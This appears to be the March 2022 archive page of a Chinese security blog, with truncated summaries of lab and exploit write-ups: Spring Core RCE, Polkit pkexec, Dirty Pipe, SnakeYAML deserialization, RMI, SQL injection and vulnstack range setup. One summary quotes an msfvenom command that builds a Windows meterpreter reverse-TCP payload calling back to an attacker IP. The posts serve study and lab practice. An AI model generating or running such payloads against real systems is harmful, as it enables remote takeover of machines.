03 2022 档案
摘要:0x01环境搭建 这几天一直闹的很火的Spring Core RCE漏洞,来复现记录一下 JDK9及其以上版本; 使⽤了Springbeans包; 使⽤了Spring参数绑定; Spring参数绑定使⽤的是⾮基本参数类型,例如般的POJO即可 Spring框架中的核心组件只有三个:Core、Cont
阅读全文
摘要:MSF上线CS 1.MSF运行exe上线 先用msfvenom生成一个木马,这里是windows的木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.255.128 LPORT=6666 -f exe >/root/Payload
阅读全文
摘要:Java有三种代理模式:静态代理、动态代理和cglib代理。 代理模式是一种设计模式 , 提供了对目标对象额外的访问方式 , 即通过代理对象访问目标对象. 举个例子 , 存在一个 对象A , 但是开发人员不希望程序直接访问 对象A , 而是通过访问一个中介对象B来间接访问 对象A , 以达成访问 对
阅读全文
摘要:环境搭建 参考:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/ 几个靶机IP信息 web-centos:两张网卡 外网一定要配置到NAT 之前傻逼了配的桥接导致出不了网 外网IP 192.168.255.130 内网IP 192.168.93.10
阅读全文
摘要:JVM中提供了三层的ClassLoader: Bootstrap classLoader:主要负责加载核心的类库(java.lang.*等),构造ExtClassLoader和APPClassLoader。 ExtClassLoader:主要负责加载jre/lib/ext目录下的一些扩展的jar。
阅读全文
摘要:前面学习了cc链,它被广泛应用与提供Java反序列化接口的攻击中。 今天来学一下RMI,Remote Method Invocation 这里没有单独写注册中心,把注册中心直接就写到服务端里面了 这是我画的一个图来方便理解他的底层原理 简单地在本地实现一个RMI服务的启动 首先是写一个RMITest
阅读全文
摘要:环境搭建 http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ ubuntu上可以再启动一下docker docker start ec 17 09 bb da 3d ab ad 靶机信息 ubuntu:ubuntu 域成员机器 douser:Dotes
阅读全文
摘要:Linux Polkit 权限提升漏洞漏洞描述 Polkit 是用于在类 Unix 操作系统中控制系统范围特权的组件。它为非特权进程提供了与特权进程进行通信的有组织的方式。 近日,国外安全团队发布公告称,在 polkit 的 pkexec 程序中发现了一个本地权限提升漏洞。pkexec 应用程序是一
阅读全文
摘要:CVE-2022-0847 它是自 5.8 以来 Linux 内核中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 它类似于CVE-2016-5195 “Dirty Cow”,但更容易被利用。 该漏洞已 在 Linux 5.16.11、5.15.2
阅读全文
摘要:感谢龙哥帮我写好的项目。 基于Springboot框架 ,使用mybatis来连接本地mysql数据库 进来配置好数据库名称 用户和密码 然后连接上数据库 这里用的语句是预编译的,之前说过order by这后面使用预编译是会报错的 select * from users where username
阅读全文
摘要:0x01环境搭建 首先在maven项目的pom文件下导入yaml的依赖 这里是1.27版本的,这里的jdk我用的是11,用1.8的没成功会抛异常 来跟着写一个实例来了解一下yaml 先写一个testSnake类 然后用yaml将该类实例对象给序列化,这里用的是dump()方法 输出结果: !!意思是
阅读全文
摘要:jscmd rce 了解一下 ScriptEngineManager:是一个工厂的集合,可以通过name或者tag的方式获取某一个脚本的工厂,并且生成一个脚本的ScriptEngine. ScriptEngine engine=new ScriptEngineManager().getEngineB
阅读全文
